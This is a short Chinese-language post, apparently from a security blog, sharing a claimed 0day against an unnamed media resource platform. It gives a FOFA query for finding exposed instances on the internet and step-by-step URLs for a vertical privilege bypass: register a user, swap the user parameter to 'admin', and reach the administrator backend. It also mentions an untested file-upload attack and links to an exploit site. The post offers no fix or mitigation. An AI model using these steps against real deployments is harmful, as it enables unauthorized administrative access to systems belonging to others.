2021-03-27
某媒体资源平台 权限绕过+文件上传 by 月球大师傅
漏洞简介
月球师傅发的某媒体资源平台 0day
资产收集
FOFA:
1 | "/Widget/common/Service/CommonWidgetService.asmx/Categorylist" |
漏洞复现
注册一个用户: http://xxx.xxx.xxx/Module/SSO/SJS_Register.aspx
登录账号,访问:/Module/PersonalCenter/Default.aspx?user=566
垂直权限绕过:/Module/PersonalCenter/Default.aspx?user=admin
跳转至管理员后台界面: /SmartMobile/MobileIndex.aspx?uname=admin&orgId=0
文件上传我没有测试成功,有个啥云waf,感兴趣的师傅可以去F12sec看看:http://www.0dayhack.net/index.php/1278/